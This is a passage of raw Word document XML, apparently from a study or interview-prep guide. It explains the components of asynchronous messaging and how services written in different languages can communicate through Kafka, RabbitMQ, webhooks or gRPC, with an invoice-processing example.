    <w:p w14:paraId="5AD85301" w14:textId="3EA61C11" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="001B732B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="896" w:name="_Toc196308376"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the measure objects i.e key things in order to make Asynchronous calls</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="896"/>
    </w:p>
    <w:p w14:paraId="7A39335E" w14:textId="75F7C400" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, there are several </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key components (measure objects)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are essential to ensure smooth, reliable, and scalable messaging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74909C" w14:textId="77777777" w:rsidR="0005565F"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70B8CAD">
          <v:rect id="_x0000_i3616" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DCAD6E" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Key Components for Asynchronous Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF61911" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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1. Message Queue or Event Bus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CA5A7"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cts as a buffer between sender and receiver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBB089"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Example: Kafka, RabbitMQ, AWS SQS, Azure Service Bus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431072CD"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Ensures decoupling and reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69110633" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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2. Producer / Publisher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D27C9AA"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ends the message to the queue/topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A705142"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Doesn’t wait for a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EA03EE"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lastRenderedPageBreak/>
        <w:t>Responsible for serialization of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A588B7" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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3. Consumer / Subscriber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7ACAB8"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Listens or pulls messages from the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFC073"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Processes them independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246B9D1"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an scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E53700D" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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4. Message Format / Schema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE767D"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ommonly JSON, Avro, or Protobuf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A149C76"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Helps both sender and receiver understand the structure of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C328DF" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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5. Message Acknowledgement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103A9DC"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onfirms successful processing of the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44983543"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Ensures reliability (e.g., Kafka offset commits or RabbitMQ ACKs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E402B1A" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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6. Retry Mechanism &amp; Dead Letter Queue (DLQ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC23D2B"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Handles failures in processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB1615B"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Retries message n times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF0A584"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f still fails, moves message to DLQ for further investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0AA167" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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7. Correlation ID / Trace ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DECE33"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Helps in tracking a message across microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329955F1"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Useful for debugging and logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F82C91B" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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8. Backpressure &amp; Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1769E063"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Prevents consumer overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D1E5B1"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ontrols flow of messages (important in high-traffic systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665AC31" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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9. Concurrency &amp; Threading (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758B950F"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synchronous processing might involve multi-threaded consumer services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E268AC" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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10. Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D64AA7"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ools like Prometheus + Grafana, ELK stack, Zipkin, or Jaeger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FABD09"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Helps in tracking message flow and identifying bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F32F058" w14:textId="77777777" w:rsidR="0005565F"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1207C1A">
          <v:rect id="_x0000_i3617" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B0CED" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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Bonus: Async in Web/Mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646BB956"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Frontend: async/await, Promises, AJAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B1FEE6"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Backend: Non-blocking frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vert.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0AE7F9" w14:textId="4C583E7F" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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55983C90">
          <v:rect id="_x0000_i3618" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5512CEDC" w14:textId="60E74BF7" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="007B5F7C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="897" w:name="_Toc196308377"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If I have two different technologies then how can we achieve asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="897"/>
    </w:p>
    <w:p w14:paraId="69247D2E" w14:textId="76E56CC3" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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If you have </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>two different technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., one service in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java/Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and another in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), you can still achieve </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standardized messaging systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>protocols</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>language-agnostic</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3430D" w14:textId="77777777" w:rsidR="0005565F"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45DF775">
          <v:rect id="_x0000_i3619" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24900E6F" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Ways to Achieve Asynchronous Communication Across Technologies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45868174" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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1. Message Brokers / Queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542123C5"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Use a common messaging platform that both systems can connect to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666143C" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65230934"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pache Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24EDB4" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Java → Produce message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBFD5BF" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Python → Consume message using libraries like confluent-kafka-python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D780BE6"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RabbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D7F27" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Java → Publish message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3B3BD" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Python → Listen via pika or aio-pika</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690338D1"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WS SQS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Azure Service Bus</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Google Pub/Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7A974" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Why it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CA6D3"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They use </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standard protocols (AMQP, HTTP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2838C4C5"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Messages are in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSON, XML, Avro, Protobuf</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which all languages can parse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E1846C" w14:textId="77777777" w:rsidR="0005565F"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3EB47AD">
          <v:rect id="_x0000_i3620" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1E851" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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2. Event-Driven Architecture (EDA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A5766"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Events are published to a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7B428"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ervices subscribe based on topics or routing keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32271CAD" w14:textId="77777777" w:rsidR="0005565F"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0429A193">
          <v:rect id="_x0000_i3621" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183F0E4" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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3. REST APIs with Polling (Less preferred)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD1EB6"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One service POSTs data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B501BB0"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nother polls endpoint to retrieve data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42F42D"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Not ideal but still asynchronous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E0F88" w14:textId="77777777" w:rsidR="0005565F"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C284331">
          <v:rect id="_x0000_i3622" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C69C31" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565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4. Webhooks (Push-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7262B7B9"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ervice A (e.g., Java) sends an HTTP POST to a callback URL of Service B (e.g., Python Flask API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F2FB0" w14:textId="77777777" w:rsidR="0005565F"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FA690E2">
          <v:rect id="_x0000_i3623" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4559F7" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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5. gRPC with Streaming (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28992935"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gRPC supports multiple languages and has support for </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous bi-directional streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE8CE1" w14:textId="77777777" w:rsidR="0005565F"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410FF05">
          <v:rect id="_x0000_i3624" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFF572D" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Real-World Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC01F1B"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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77762CC4"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Java Spring Boot service generates invoice data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA052DE"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Python service processes invoice for tax computation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2097C546"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olution</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7977D1DD"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Java pushes JSON message to Kafka topic invoice-generated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAF769"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Python listens to invoice-generated, processes, and pushes to another topic tax-processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B22ED2" w14:textId="77777777" w:rsidR="0005565F" w:rsidRPr="00617E2C" w:rsidRDefault="0005565F"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Java listens to tax-processed for next action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B68FA" w14:textId="71353EEB" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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3F711B68">
